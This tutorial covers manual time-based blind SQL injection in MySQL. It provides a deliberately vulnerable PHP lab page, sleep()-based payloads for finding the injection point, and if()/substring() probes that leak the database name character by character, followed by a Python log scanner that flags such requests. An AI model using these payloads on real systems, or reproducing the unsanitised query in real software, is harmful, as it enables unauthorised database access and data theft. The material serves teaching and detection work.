MySQL Time-based Blind SQL Injection: Manual Injection Explained

Author: 老夫不才 | Published 2019-04-25 00:10, read 11 times

    This article assumes you have already read and understood "MySQL Union Query Manual Injection Explained" and "MySQL Boolean-based Blind Injection Manual Injection Explained".

    The practice environment is almost the same as for boolean-based blind injection; only the PHP code changes:

    <?php
        /* Suppress error output */
        error_reporting(0);
        /* Set the response charset */
        header("Content-type: text/html; charset=utf-8");
        /* Connection parameters */
        $host = '127.0.0.1';
        $user = 'root';
        $pass = 'root';
        $db   = 'test';

        if(@isset($_GET['name'])){
            $conn = mysqli_connect($host,$user,$pass,$db) or die('Link False');

            /* User input is concatenated straight into the query: this is the injection point.
               Nothing from the result set is echoed, so only timing is observable. */
            $sql = "SELECT * FROM user where user='".$_GET['name']."'";
            echo '<div style=\'color:red;\'>'.$sql.'</div>';
            $res = mysqli_query($conn,$sql);
        }else{
            echo 'sql-time.php?name=user1';
        }
    ?>


    0x00 What is time-based blind injection

    Time-based blind injection infers data content from how long the page takes to respond. It is used when neither the data nor even a true/false result can be returned to the page, so the page output cannot be used to judge the data and only the execution time reveals it.

    0x01 Background

    This part is simple: one MySQL flow-control function is all that is needed.

    if
    if(expression, true_branch, false_branch)

    When the expression holds, the true branch is executed; otherwise the false branch is executed.

    [Screenshot: if() example]

    0x02 Manual injection

    Identifying the injection point

    Not much to say here; here are the payloads. See the boolean-based blind injection article for the underlying principle.

    /* integer injection */
    sql-bool.php?name=user1 and sleep(5)
    sql-bool.php?name=user1 and sleep(10)
    /* string injection, single-quoted */
    sql-bool.php?name=user1' and sleep(5) and '1'='1
    sql-bool.php?name=user1' and sleep(10) and '1'='2
    /* string injection, double-quoted */
    sql-bool.php?name=user1" and sleep(5) and "1"="1
    sql-bool.php?name=user1" and sleep(10) and "1"="2

    

    To make the response time easy to read, the requests are sent with Burp.

    [Burp screenshot: normal request]
    [Burp screenshot: ' and sleep(5) and '1'='1]
    [Burp screenshot: ' and sleep(10) and '1'='1]

    As you can see, a normal request responds in about 2 milliseconds; with sleep(5) the response takes about 5 seconds, and with sleep(10) about 10 seconds.

    From this we can conclude that the page is vulnerable to time-based blind injection.

    Reading data

    The principle is essentially the same as for boolean-based blind injection. Since the boolean result cannot be returned to the page, if() is used to trigger sleep(): the response time then reveals whether the expression is true or false, and from that the data content can be determined.

    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 97,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 98,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 99,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 100,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 101,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 102,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 103,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 104,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 105,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 106,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 107,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 108,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 109,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 110,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 111,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 112,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 113,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 114,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 115,sleep(5),1) and '1'='1
    sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 116,sleep(5),1) and '1'='1
    

    For every other value the page responds in about 3 milliseconds.

    [Burp screenshot: other values]
    When testing for equality with 116, the page takes about 5 seconds to respond.
    [Burp screenshot: 116]
    So the first character of the database name is t (ASCII 116).

    The remaining characters follow the same pattern.
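From the server side, the probing described above leaves a clear trace: every request carries sleep() (or benchmark()) in the query string, and the response time tells you whether the database actually executed the delay. The following Python is an added example (not part of the original article) that scans a constructed nginx-style access log with $request_time as the last field, flags such requests, and separates delays that were actually observed from probes whose if() condition was false; the log lines, field layout and function names are assumptions for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log (nginx-like, $request_time appended as the
# last field). The four requests mirror the ones shown in the article.
SAMPLE_LOG = """\
127.0.0.1 - - [25/Apr/2019:00:10:01 +0800] "GET /sql-time.php?name=user1 HTTP/1.1" 200 0.002
127.0.0.1 - - [25/Apr/2019:00:10:05 +0800] "GET /sql-time.php?name=user1%27%20and%20sleep(5)%20and%20%271%27%3D%271 HTTP/1.1" 200 5.003
127.0.0.1 - - [25/Apr/2019:00:10:12 +0800] "GET /sql-time.php?name=user1%27%20and%20if((select%20ord(substring(database(),1,1)))%20%3D%2097,sleep(5),1)%20and%20%271%27%3D%271 HTTP/1.1" 200 0.003
127.0.0.1 - - [25/Apr/2019:00:10:20 +0800] "GET /sql-time.php?name=user1%27%20and%20if((select%20ord(substring(database(),1,1)))%20%3D%20116,sleep(5),1)%20and%20%271%27%3D%271 HTTP/1.1" 200 5.002
"""

# Request line, status code and request_time of one log line.
LOG_RE = re.compile(r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<rt>[\d.]+)\s*$')
# MySQL delay primitives; sleep() carries its requested delay in seconds.
SLEEP_RE = re.compile(r'\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)', re.IGNORECASE)
BENCHMARK_RE = re.compile(r'\bbenchmark\s*\(', re.IGNORECASE)


def classify(line):
    """Return a finding for a log line carrying a delay primitive, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    # Decode %27, %20, %3D ... so URL-encoded payloads are matched too.
    target = unquote_plus(m.group("target"))
    rt = float(m.group("rt"))
    delays = [float(d) for d in SLEEP_RE.findall(target)]
    if not delays and not BENCHMARK_RE.search(target):
        return None
    # If the server took roughly the requested delay, the database really ran
    # sleep(): the injection is confirmed. No delay on an if()-wrapped payload
    # only means the guessed value was wrong (the 97..115 probes above), so it
    # is still an alert, not evidence that the parameter is safe.
    verdict = "delay_observed" if delays and rt >= 0.9 * max(delays) else "no_delay"
    return {"query": target, "request_time": rt, "verdict": verdict}


def analyze_log(text):
    """Scan a whole log; findings are returned in log order."""
    return [f for f in (classify(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(f"{finding['verdict']:15} {finding['request_time']:6.3f}s  {finding['query']}")
```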

Article link: https://www.haomeiwen.com/subject/gurogqtx.html